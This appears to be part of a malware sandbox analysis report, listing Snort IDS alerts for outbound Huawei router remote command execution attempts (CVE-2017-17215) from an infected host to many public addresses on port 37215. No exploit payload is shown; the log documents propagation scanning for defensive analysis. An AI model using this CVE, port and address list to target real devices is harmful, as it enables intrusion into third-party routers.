          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55380 -> 157.92.60.138:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55380 -> 157.92.60.138:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58970 -> 31.154.175.69:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58970 -> 31.154.175.69:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36430 -> 45.36.223.239:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36430 -> 45.36.223.239:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56256 -> 31.86.73.36:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56256 -> 31.86.73.36:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52466 -> 31.197.13.109:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52466 -> 31.197.13.109:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50494 -> 121.24.77.221:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50494 -> 121.24.77.221:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33118 -> 41.84.84.245:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33118 -> 41.84.84.245:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46008 -> 197.43.254.7:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46008 -> 197.43.254.7:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34752 -> 157.65.189.41:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34752 -> 157.65.189.41:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36718 -> 181.118.204.120:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36718 -> 181.118.204.120:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41052 -> 138.58.204.135:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41052 -> 138.58.204.135:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47924 -> 121.231.5.112:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47924 -> 121.231.5.112:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49658 -> 222.49.11.227:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49658 -> 222.49.11.227:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54112 -> 31.187.11.64:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54112 -> 31.187.11.64:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56256 -> 74.53.15.164:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56256 -> 74.53.15.164:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58804 -> 94.179.126.46:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58804 -> 94.179.126.46:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35160 -> 186.162.79.2:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35160 -> 186.162.79.2:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33974 -> 190.199.26.120:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33974 -> 190.199.26.120:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59634 -> 190.226.191.101:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59634 -> 190.226.191.101:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50122 -> 197.68.203.199:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50122 -> 197.68.203.199:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58656 -> 121.207.102.103:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58656 -> 121.207.102.103:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50106 -> 31.243.217.94:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50106 -> 31.243.217.94:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38834 -> 41.231.209.209:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38834 -> 41.231.209.209:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36960 -> 37.47.242.85:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36960 -> 37.47.242.85:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43324 -> 31.173.59.63:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43324 -> 31.173.59.63:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42548 -> 31.126.36.104:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42548 -> 31.126.36.104:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54782 -> 190.59.89.111:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54782 -> 190.59.89.111:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35178 -> 181.161.196.146:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35178 -> 181.161.196.146:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60256 -> 157.137.69.75:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60256 -> 157.137.69.75:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:32850 -> 222.198.48.241:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:32850 -> 222.198.48.241:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42776 -> 121.225.203.131:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42776 -> 121.225.203.131:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45096 -> 102.204.49.113:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45096 -> 102.204.49.113:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40586 -> 122.146.178.23:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40586 -> 122.146.178.23:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37996 -> 222.132.104.13:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37996 -> 222.132.104.13:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58220 -> 102.102.187.64:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58220 -> 102.102.187.64:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40880 -> 190.220.115.96:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40880 -> 190.220.115.96:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36540 -> 197.1.30.213:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36540 -> 197.1.30.213:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51676 -> 138.187.164.183:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51676 -> 138.187.164.183:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45068 -> 94.191.247.57:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45068 -> 94.191.247.57:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34894 -> 121.85.94.168:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34894 -> 121.85.94.168:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58302 -> 157.136.134.218:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58302 -> 157.136.134.218:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55306 -> 222.101.195.237:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55306 -> 222.101.195.237:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38468 -> 45.96.224.191:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38468 -> 45.96.224.191:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49042 -> 94.20.55.151:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49042 -> 94.20.55.151:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34720 -> 197.98.33.110:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34720 -> 197.98.33.110:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47706 -> 122.164.105.137:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47706 -> 122.164.105.137:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47224 -> 222.79.189.122:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47224 -> 222.79.189.122:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55146 -> 186.141.93.188:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55146 -> 186.141.93.188:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:32904 -> 45.49.61.54:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:32904 -> 45.49.61.54:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54746 -> 138.51.92.119:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54746 -> 138.51.92.119:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48752 -> 121.92.174.225:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48752 -> 121.92.174.225:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46598 -> 181.108.59.93:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46598 -> 181.108.59.93:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37798 -> 37.187.201.32:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37798 -> 37.187.201.32:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47978 -> 222.39.182.221:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47978 -> 222.39.182.221:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33280 -> 102.5.99.76:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33280 -> 102.5.99.76:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47666 -> 94.110.142.194:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47666 -> 94.110.142.194:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47108 -> 138.43.45.216:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47108 -> 138.43.45.216:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33040 -> 210.38.44.91:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33040 -> 210.38.44.91:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55728 -> 190.18.104.131:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55728 -> 190.18.104.131:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56258 -> 197.222.209.218:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56258 -> 197.222.209.218:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36064 -> 222.4.216.143:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36064 -> 222.4.216.143:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60398 -> 122.13.2.191:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60398 -> 122.13.2.191:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40016 -> 41.44.121.198:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40016 -> 41.44.121.198:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45374 -> 181.244.216.231:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45374 -> 181.244.216.231:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46736 -> 37.212.82.109:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46736 -> 37.212.82.109:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:32850 -> 157.55.37.55:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:32850 -> 157.55.37.55:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44892 -> 63.242.190.102:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44892 -> 63.242.190.102:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33064 -> 41.153.24.4:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33064 -> 41.153.24.4:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38484 -> 190.175.129.19:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38484 -> 190.175.129.19:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48024 -> 122.33.7.13:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48024 -> 122.33.7.13:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38460 -> 142.157.33.144:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38460 -> 142.157.33.144:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53654 -> 156.39.248.208:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53654 -> 156.39.248.208:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33198 -> 41.106.137.202:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33198 -> 41.106.137.202:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52584 -> 181.106.230.16:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52584 -> 181.106.230.16:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46962 -> 31.149.200.227:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46962 -> 31.149.200.227:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36412 -> 222.231.170.4:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36412 -> 222.231.170.4:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58102 -> 31.184.51.92:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58102 -> 31.184.51.92:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48730 -> 222.217.206.225:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48730 -> 222.217.206.225:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36150 -> 186.215.164.83:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36150 -> 186.215.164.83:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37650 -> 156.86.162.25:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37650 -> 156.86.162.25:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46858 -> 222.38.14.93:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46858 -> 222.38.14.93:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52072 -> 121.177.44.2:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52072 -> 121.177.44.2:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47756 -> 94.114.64.64:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47756 -> 94.114.64.64:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46970 -> 122.227.64.110:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46970 -> 122.227.64.110:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52576 -> 157.24.205.223:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52576 -> 157.24.205.223:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54294 -> 156.117.12.146:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54294 -> 156.117.12.146:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35420 -> 156.242.238.110:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35420 -> 156.242.238.110:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54598 -> 138.124.23.41:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54598 -> 138.124.23.41:37215
          Source: global trafficTCP traffic: 41.122.234.109 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 122.23.99.204 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 121.223.174.71 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 190.4.30.170 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 186.99.28.188 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 122.203.152.26 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 121.246.67.19 ports 1,2,3,5,7,37215
